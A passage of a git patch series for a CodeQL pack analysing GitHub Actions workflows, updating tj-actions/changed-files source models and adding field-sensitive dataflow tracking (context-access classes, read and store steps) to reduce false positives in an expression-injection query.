"other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 076ecff353c4..408abfbb8d0c 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"] - - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] From e6b4676f9086d10bae70eb380bca48fa635eaf96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 14 Feb 2024 10:47:00 +0100 Subject: [PATCH 029/707] feat(field-flow): enhance dataflow tracking implement field flow to reduce false positives --- ql/lib/codeql/actions/Ast.qll | 148 +++++++++++++----- .../codeql/actions/ast/internal/Actions.qll | 6 +- .../codeql/actions/dataflow/ExternalFlow.qll | 76 +++++++-- .../codeql/actions/dataflow/FlowSources.qll | 36 +---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 59 ++----- .../dataflow/internal/DataFlowPrivate.qll | 116 +++++++++++--- .../dataflow/internal/DataFlowPublic.qll | 47 ++++-- ql/lib/ext/tj-actions-changed-files.model.yml | 46 +++--- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/test/.github/workflows/ci-cleanup.yml | 47 ------ .../workflows/image_link_generator.yml | 24 +-- .../workflows/image_link_generator_2.yml | 61 -------- .../workflows/image_link_generator_3.yml | 27 ---- .../workflows/{inter1.yml => inter-job.yml} | 0 ql/src/test/.github/workflows/simple1.yml | 9 +- ql/src/test/.github/workflows/simple2.yml | 6 + ql/src/test/.github/workflows/test.yml | 7 +- 17 files changed, 379 insertions(+), 340 deletions(-) delete mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml delete mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/.github/workflows/{inter1.yml => inter-job.yml} (100%) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 6307897685f8..087b7f19e626 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -95,6 +95,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } + + string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } class InputExpr extends Expression instanceof YamlString { @@ -158,6 +160,10 @@ class JobStmt extends Statement instanceof Actions::Job { * arg1: value1 */ JobUsesExpr getUsesExpr() { result.getJobStmt() = this } + + predicate usesReusableWorkflow() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + } } /** @@ -353,26 +359,51 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } +} + +/** + * A context access expression. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +class CtxAccessExpr extends ExprAccessExpr { + CtxAccessExpr() { + expr.regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + ]) + } + + abstract string getFieldName(); abstract Expression getRefExpr(); } +private string stepsCtxRegex() { result = "steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string needsCtxRegex() { result = "needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string jobsCtxRegex() { result = "jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)" } + +private string envCtxRegex() { result = "env\\.([A-Za-z0-9_-]+)" } + +private string inputsCtxRegex() { result = "inputs\\.([A-Za-z0-9_-]+)" } + /** - * Holds for an ExprAccessExpr accesing the `steps` context. + * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepOutputAccessExpr extends ExprAccessExpr { +class StepsCtxAccessExpr extends CtxAccessExpr { string stepId; - string varName; + string fieldName; - StepOutputAccessExpr() { - stepId = - this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and - varName = - this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + StepsCtxAccessExpr() { + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId @@ -380,79 +411,112 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * Holds for an expression accesing the `needs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsCtxAccessExpr extends CtxAccessExpr { + JobStmt job; + string jobId; + string fieldName; + + NeedsCtxAccessExpr() { + expr.regexpMatch(needsCtxRegex()) and + jobId = expr.regexpCapture(needsCtxRegex(), 1) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + job.getId() = jobId + } + + predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + job.getLocation().getFile() = this.getLocation().getFile() and + ( + // regular jobs + job.getOutputStmt().getOutputExpr(fieldName) = result + or + // jobs calling reusable workflows + job.getUsesExpr() = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobOutputAccessExpr extends ExprAccessExpr { +class JobsCtxAccessExpr extends CtxAccessExpr { string jobId; - string varName; - - JobOutputAccessExpr() { - jobId = - this.getExpression() - .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and - varName = - this.getExpression() - .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) + string fieldName; + + JobsCtxAccessExpr() { + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - ( - // A Job can have multiple outputs, so we need to check both - // jobs..outputs. - job.getOutputStmt().getOutputExpr(varName) = result - or - // jobs..uses (variables returned from the reusable workflow - job.getUsesExpr() = result - ) + job.getOutputStmt().getOutputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `inputs` context. + * Holds for an expression the `inputs` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputAccessExpr extends ExprAccessExpr { - string paramName; +class InputsCtxAccessExpr extends CtxAccessExpr { + string fieldName; - InputAccessExpr() { - paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + InputsCtxAccessExpr() { + expr.regexpMatch(inputsCtxRegex()) and + fieldName = expr.regexpCapture(inputsCtxRegex(), 1) } + override string getFieldName() { result = fieldName } + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(fieldName) = result ) or exists(CompositeActionStmt a | a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(paramName) = result + a.getInputsStmt().getInputExpr(fieldName) = result ) } } /** - * Holds for an ExprAccessExpr accesing the `env` context. + * Holds for an expression accesing the `env` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvAccessExpr extends ExprAccessExpr { - string varName; +class EnvCtxAccessExpr extends CtxAccessExpr { + string fieldName; + + EnvCtxAccessExpr() { + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + } - EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) or - exists(RunExpr s | s.getEnvExpr(varName) = result) + exists(RunExpr s | s.getEnvExpr(fieldName) = result) } } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index a11759b0c932..2fb17eef88bf 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll @@ -294,8 +294,10 @@ module Actions { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ string getGitHubRepository() { result = - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) + ( + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6d..c2da24ba52c6 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,21 +2,31 @@ private import internal.ExternalFlowExtensions as Extensions import codeql.actions.DataFlow import actions -/** Holds if a source model exists for the given parameters. */ +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ predicate sourceModel(string action, string version, string output, string trigger, string kind) { Extensions::sourceModel(action, version, output, trigger, kind) } -/** Holds if a sink model exists for the given parameters. */ +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate summaryModel(string action, string version, string input, string output, string kind) { Extensions::summaryModel(action, version, input, output, kind) } -/** Holds if a sink model exists for the given parameters. */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) -} - /** * MaD sinks * Fields: @@ -25,7 +35,55 @@ predicate sinkModel(string action, string version, string input, string kind) { * - input arg: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ -predicate sinkNode(DataFlow::ExprNode sink, string kind) { +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { + exists(UsesExpr uses, string action, string version, string trigger, string kind | + sourceModel(action, version, fieldName, trigger, kind) and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if fieldName.trim().matches("env.%") + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + else + if fieldName.trim().matches("output.%") + then + // 'output.' is the default qualifier + source.asExpr() = uses + else none() + ) and + sourceType = kind + ) +} + +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(UsesExpr uses, string action, string version, string input, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + summaryModel(action, version, input, output, "taint") and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + ) and + succ.asExpr() = uses + ) +} + +predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") @@ -33,7 +91,7 @@ predicate sinkNode(DataFlow::ExprNode sink, string kind) { else sink.asExpr() = uses.getArgumentExpr(input.trim()) ) and sinkModel(action, version, input, kind) and - uses.getCallee() = action and + uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fae6c74b0b3c..2b35b2f332f0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -126,40 +126,14 @@ private class EventSource extends RemoteFlowSource { } /** - * MaD sources - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + * A Source of untrusted data defined in a MaD specification */ private class ExternallyDefinedSource extends RemoteFlowSource { - string soutceType; - - ExternallyDefinedSource() { - exists( - UsesExpr uses, string action, string version, string output, string trigger, string kind - | - sourceModel(action, version, output, trigger, kind) and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if output.trim().matches("env.%") - then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) - else - // 'output.' is the default qualifier - // TODO: Taint just the specified output - this.asExpr() = uses - ) and - soutceType = kind - ) - } + string sourceType; + + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } - override string getSourceType() { result = soutceType } + override string getSourceType() { result = sourceType } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 750a4011320e..9def461900eb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -21,42 +21,11 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * MaD summaries - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - input arg: From node (prefixed with either `env.` or `input.`) - * - output arg: To node (prefixed with either `env.` or `output.`) - * - kind: Either 'Taint' or 'Value' - */ -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr uses, string action, string version, string input | - // `output` not used yet - summaryModel(action, version, input, _, "taint") and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) - else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) - ) and - succ.asExpr() = uses - ) -} - -private class ExternallyDefinedSummary extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - externallyDefinedSummary(pred, succ) - } -} - +// private class RunEnvToScriptStep extends AdditionalTaintStep { +// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { +// runEnvToScriptstep(pred, succ) +// } +// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. @@ -68,23 +37,21 @@ private class ExternallyDefinedSummary extends AdditionalTaintStep { * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') * echo "Cleaned Initial URL: $INITIAL_URL" * echo "::set-output name=initial_url::$INITIAL_URL" + * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT + * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - runEnvToScriptstep(pred, succ) - } -} - -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { - exists(RunExpr r, string varName | +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(RunExpr r, string varName, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and ( - line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") + output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or + output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and + // TODO: repalce script with line below script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 79bd48b395a7..55fda0387894 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -4,6 +4,8 @@ private import codeql.actions.Cfg as Cfg private import codeql.Locations private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.FlowSteps cached newtype TNode = TExprNode(DataFlowExpr e) @@ -129,25 +131,43 @@ predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } -private newtype TContent = TNoContent() { none() } +newtype TContent = + TFieldContent(string name) { + name = any(StepsCtxAccessExpr a).getFieldName() or + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() + } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ class Content extends TContent { - /** Gets a textual representation of this element. */ - string toString() { none() } -} + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } -predicate forceHighPrecision(Content c) { none() } + /** Gets a textual representation of this element. */ + abstract string toString(); -newtype TContentSet = TNoContentSet() { none() } + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } +} -private newtype TContentApprox = TNoContentApprox() { none() } +predicate forceHighPrecision(Content c) { c instanceof FieldContent } -class ContentApprox extends TContentApprox { - /** Gets a textual representation of this element. */ - string toString() { none() } -} +class ContentApprox = ContentSet; -ContentApprox getContentApprox(Content c) { none() } +ContentApprox getContentApprox(Content c) { result = c } /** * Made a string to match the ArgumentPosition type. @@ -169,11 +189,15 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = /** * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * But only for those cases where the step output is defined externally in a MaD specification. + * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access + * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. * e.g. ${{ steps.step1.output.foo }} */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepOutputAccessExpr astTo | - (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -182,13 +206,14 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} */ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, JobOutputAccessExpr astTo | + exists(Expression astFrom, CtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getRefExpr() = astFrom and + (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) ) } @@ -197,7 +222,7 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputAccessExpr astTo | + exists(Expression astFrom, InputsCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -209,10 +234,13 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvAccessExpr astTo | + exists(Expression astFrom, EnvCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + ( + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + astTo.getRefExpr() = astFrom + ) ) } @@ -244,19 +272,63 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * A read step to read the value of a ReusableWork uses step and connect it to its + * corresponding JobOutputAccessExpr + */ +predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { + exists(NeedsCtxAccessExpr expr, string fieldName | + expr.usesReusableWorkflow() and + expr.getRefExpr() = node1.asExpr() and + expr.getFieldName() = fieldName and + expr = node2.asExpr() and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} + /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { none() } +predicate readStep(Node node1, ContentSet c, Node node2) { + // TODO: Extract to its own predicate + exists(StepsCtxAccessExpr access | + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access + ) + or + reusableWorkflowReturnReadStep(node1, node2, c) +} + +/** + * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * with a given access path (fieldName) + */ +predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { + exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | + out = stmt.getOutputsStmt() and + node1.asExpr() = out.getOutputExpr(fieldName) and + node2.asExpr() = out and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} /** * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. */ -predicate storeStep(Node node1, ContentSet c, Node node2) { none() } +predicate storeStep(Node node1, ContentSet c, Node node2) { + reusableWorkflowReturnStoreStep(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + externallyDefinedSummary(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + runEnvToScriptstep(node1, node2, c) +} /** * Holds if values stored inside content `c` are cleared at node `n`. For example, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 0204015ac22a..52101c7e5a77 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -83,18 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputExpr output; + private OutputsStmt outputs; ReturnNode() { - this.asExpr() = output and - output = any(OutputsStmt s).getOutputExpr(_) + this.asExpr() = outputs and + outputs = any(ReusableWorkflowStmt s).getOutputsStmt() } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "output " + output.toString() } + override string toString() { result = "output " + outputs.toString() } - override Location getLocation() { result = output.getLocation() } + override Location getLocation() { result = outputs.getLocation() } } /** Gets the node corresponding to `e`. */ @@ -106,13 +106,38 @@ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } * The set may be interpreted differently depending on whether it is * stored into (`getAStoreContent`) or read from (`getAReadContent`). */ -class ContentSet extends TContentSet { - /** Gets a textual representation of this element. */ - string toString() { none() } - +class ContentSet instanceof Content { /** Gets a content that may be stored into when storing into this set. */ - Content getAStoreContent() { none() } + Content getAStoreContent() { result = this } /** Gets a content that may be read from when reading from this set. */ - Content getAReadContent() { none() } + Content getAReadContent() { result = this } + + /** Gets a textual representation of this content set. */ + string toString() { result = super.toString() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see 